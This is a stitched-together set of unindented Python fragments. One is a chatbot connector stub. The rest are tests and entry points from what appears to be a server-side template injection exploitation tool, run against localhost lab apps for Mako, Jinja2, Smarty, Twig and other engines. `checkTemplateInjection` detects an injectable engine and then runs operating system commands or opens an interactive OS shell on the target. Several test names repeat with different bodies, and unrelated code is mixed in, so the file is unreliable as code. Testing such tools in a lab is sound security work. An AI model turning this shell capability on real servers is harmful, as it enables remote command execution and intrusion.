def _on_schedule(self):
""" This method is called repeatedly from an event loop """
return
# sender/receiver/stream id's are automatically translated by the base class Connector
# when calling methods _pop_message_to_send() and _push_received_message()
# example of incoming message for the bot in private
message = Message.build('Hi @globot please ask for service #sample')
channel = Channel(11, 0, None, self.get_name())
self._push_received_message(message, channel)
# example of incoming message for the bot in chatroom
message = Message.build('Hi @globot please ask for service #sample')
channel = Channel(60, 0, 777, self.get_name())
self._push_received_message(message, channel)
# example of incoming message in chatroom for another agent
message = Message.build('Hi folks nothing new today')
channel = Channel(11, 60, 777, self.get_name())
self._push_received_message(message, channel)
# example of outgoing message
while True:
ret = self._pop_message_to_send()
if ret is None: break
(message, channel) = ret
def test_reflection(self):
template = '%s'
channel = Channel({'url': 'http://127.0.0.1:15003/velocity?inj=*'})
Velocity(channel).detect()
self.assertEqual(channel.data, self.expected_data)
def test_reflection_unsecured(self):
channel = Channel({
'url' : 'http://127.0.0.1:15002/twig-1.24.1-secured.php?inj=*'
})
Twig(channel).detect()
self.assertEqual(channel.data, self.expected_data)
def test_reflection_within_text(self):
template = 'AAAA%sAAAA'
channel = Channel({'url': 'http://127.0.0.1:15003/freemarker?inj=*'})
Freemarker(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def main():
args = vars(cliparser.options)
if not args.get('url'):
cliparser.parser.error('URL is required. Run with -h for help.')
checks.check_template_injection(Channel(args))
def test_reflection_context_text(self):
template = 'AAAA%sAAAA'
channel = Channel({
'url':
'http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*' % template
})
Jinja2(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_reflection_unsecured(self):
channel = Channel({
'url':
'http://127.0.0.1:15002/smarty-3.1.29-unsecured.php?inj=*'
})
Smarty(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_no_reflection(self):
channel = Channel({
'url': 'http://127.0.0.1:15001/reflect/mako?inj2=asd2',
'force_level': [0, 0],
'injection_tag': '*'
})
detect_template_injection(channel, [Mako])
self.assertEqual(channel.data, {})
def test_reflection_secured(self):
channel = Channel(
{'url': 'http://127.0.0.1:15002/smarty-3.1.29-secured.php?inj=*'})
Smarty(channel).detect()
expected_data = self.expected_data.copy()
del expected_data['eval']
del expected_data['exec']
self.assertEqual(channel.data, expected_data)
def _get_detection_obj_data(self, url, level=0, closure_level=0):
channel = Channel({'url': url, 'force_level': [level, closure_level]})
obj = self.plugin(channel)
obj.detect()
# Delete OS to make the tests portable
if 'os' in channel.data:
del channel.data['os']
return obj, channel.data
def test_header_reflection(self):
template = '%s'
channel = Channel({
'url': 'http://127.0.0.1:15001/header/mako',
'headers': ['User-Agent: *']
})
Mako(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_quotes(self):
channel = Channel({
'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd',
'force_level': [0, 0],
'injection_tag': '*'
})
obj = detect_template_injection(channel, [Mako])
result = obj.execute("""echo 1"2"'3'\\"\\'""")
self.assertEqual(result, """123"'""")
channel = Channel({
'url': 'http://127.0.0.1:15001/blind/mako?inj=asd',
'force_level': [0, 0],
'injection_tag': '*'
})
obj = detect_template_injection(channel, [Mako])
self.assertTrue(obj.execute_blind("""echo 1"2"'3'\\"\\'"""))
def test_reflection_multiple_point_no_tag(self):
channel = Channel({
'url': 'http://127.0.0.1:15001/reflect/mako?inj=asd&inj2=asd2',
'force_level': [0, 0],
'injection_tag': '*'
})
detect_template_injection(channel, [Mako])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_reflection_point_dont_startswith(self):
channel = Channel({
'url':
'http://127.0.0.1:15001/startswith/mako?inj=*&startswith=thismustexists',
'force_level': [0, 0],
'injection_tag': '*'
})
detect_template_injection(channel, [Mako])
self.assertEqual(channel.data, {})
def test_post_reflection(self):
template = '%s'
channel = Channel({
'url': 'http://127.0.0.1:15001/post/mako',
'post_data': ['inj=*']
})
Mako(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_reflection(self):
template = '%s'
channel = Channel({
'url':
'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=*' % template
})
Mako(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_post_reflection(self):
template = '%s'
channel = Channel({
'url': 'http://127.0.0.1:15001/post/mako',
'force_level': [0, 0],
'data': 'inj=*&othervar=1'
})
Mako(channel).detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_reflection_quotes(self):
channel = Channel({
'url':
'http://127.0.0.1:15001/reflect/jinja2?&inj=*',
})
jinja2 = Jinja2(channel)
result = jinja2.execute('echo 1"2"')
self.assertEqual(result, '12')
result = jinja2.execute('echo 1\\"2')
self.assertEqual(result, '1"2')
def test_reflection_point_startswith(self):
channel = Channel({
'url' : 'http://127.0.0.1:15001/startswith/mako?inj=thismustexists*&startswith=thismustexists',
'force_level': [ 0, 0 ],
'injection_tag': '*',
'technique': 'R'
})
detect_template_injection(channel, [ Mako ])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def checkTemplateInjection(args):
channel = Channel(args)
current_plugin = None
# Iterate all the available plugins until
# the first template engine is detected.
for plugin in plugins:
current_plugin = plugin(channel)
current_plugin.detect()
if channel.data.get('engine'):
break
# Kill execution if no engine have been found
if not channel.data.get('engine'):
log.fatal(
"""Tested parameters appear to be not injectable. Try to increase '--level' value to perform more tests."""
)
return
# If there are no operating system actions, exit
if not any(f
for f, v in args.items() if f in ('os_cmd', 'os_shell') and v):
log.warn("""Tested parameters have been found injectable.""")
if channel.data.get('exec'):
log.warn(
"""Try options '--os-cmd' or '--os-shell' to access the underlying operating system."""
)
# Execute operating system commands
if channel.data.get('exec'):
if args.get('os_cmd'):
print current_plugin.execute(args.get('os_cmd'))
elif args.get('os_shell'):
log.warn('Run commands on the operating system.')
Shell(current_plugin.execute,
'%s $ ' % (channel.data.get('os', ''))).cmdloop()
# Execute operating system commands
if channel.data.get('engine'):
if args.get('tpl_code'):
print current_plugin.inject(args.get('os_cmd'))
elif args.get('tpl_shell'):
log.warn(
'Inject multi-line template code. Double empty line to send the data.'
)
MultilineShell(current_plugin.inject, '%s $ ' %
(channel.data.get('engine', ''))).cmdloop()
def test_wrong_auth_reflection(self):
channel = Channel({
'url' : 'http://localhost:15001/reflect_cookieauth/mako?inj=asd*',
'force_level': [ 0, 0 ],
'headers' : [ 'Cookie: SID=WRONGSECRET' ],
'injection_tag': '*',
'technique': 'R'
})
detect_template_injection(channel, [ Mako ])
self.assertEqual(channel.data, {})
def test_url_reflection(self):
channel = Channel({
'url' : 'http://127.0.0.1:15001/url/mako/AA*AA',
'force_level': [ 0, 0 ],
'injection_tag': '*',
'technique': 'R'
})
detect_template_injection(channel, [ Mako ])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_reflection_multiple_point(self):
template = '%s'
channel = Channel({
'url' : 'http://127.0.0.1:15001/reflect/mako?tpl=%s&asd=1&asd2=*&inj=*&inj2=*&inj3=*',
'force_level': [ 0, 0 ],
'injection_tag': '*'
})
detect_template_injection(channel, [ Mako ])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_reflection_limit(self):
template = '%s'
channel = Channel({
'url':
'http://127.0.0.1:15001/limit/mako?tpl=%s&inj=*' % template
})
Mako(channel).detect()
expected_data = {'render_tag': self.expected_data['render_tag']}
self.assertEqual(channel.data, expected_data)
def test_custom_injection_tag(self):
template = '%s'
channel = Channel({
'url': 'http://127.0.0.1:15001/reflect/mako?tpl=%s&inj=~',
'force_level': [0, 0],
'injection_tag': '~'
})
detect_template_injection(channel, [Mako])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def test_header_reflection(self):
template = '%s'
channel = Channel({
'url': 'http://127.0.0.1:15001/header/mako',
'force_level': [0, 0],
'headers': ['User-Agent: *'],
'injection_tag': '*'
})
detect_template_injection(channel, [Mako])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
def _get_detection_obj_data(self, url, level = 5):
channel = Channel({
'url' : url
})
obj = self.plugin(channel)
obj.channel.args['level'] = level
obj.detect()
# Delete OS to make the tests portable
if 'os' in channel.data:
del channel.data['os']
return obj, channel.data
def test_reflection_context_code(self):
template = '{{%s}}'
channel = Channel({
'url':
'http://127.0.0.1:15001/reflect/jinja2?tpl=%s&inj=*' % template
})
Jinja2(channel).detect()
expected_data = self.expected_data.copy()
expected_data.update({'prefix': '""}}', 'suffix': '{{""'})
del channel.data['os']
self.assertEqual(channel.data, expected_data)
def _get_detection_obj_data(self, url, level = 0, closure_level = 0):
channel = Channel({
'url' : url,
'force_level': [ level, closure_level ],
'injection_tag': '*'
})
obj = detect_template_injection(channel, [ self.plugin ])
# Delete OS to make the tests portable
if 'os' in channel.data:
del channel.data['os']
return obj, channel.data
def test_put_reflection(self):
template = '%s'
channel = Channel({
'url': 'http://127.0.0.1:15001/put/mako',
'data': 'inj=*&othervar=1',
'request': 'PUT',
'force_level': [0, 0],
'injection_tag': '*'
})
detect_template_injection(channel, [Mako])
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
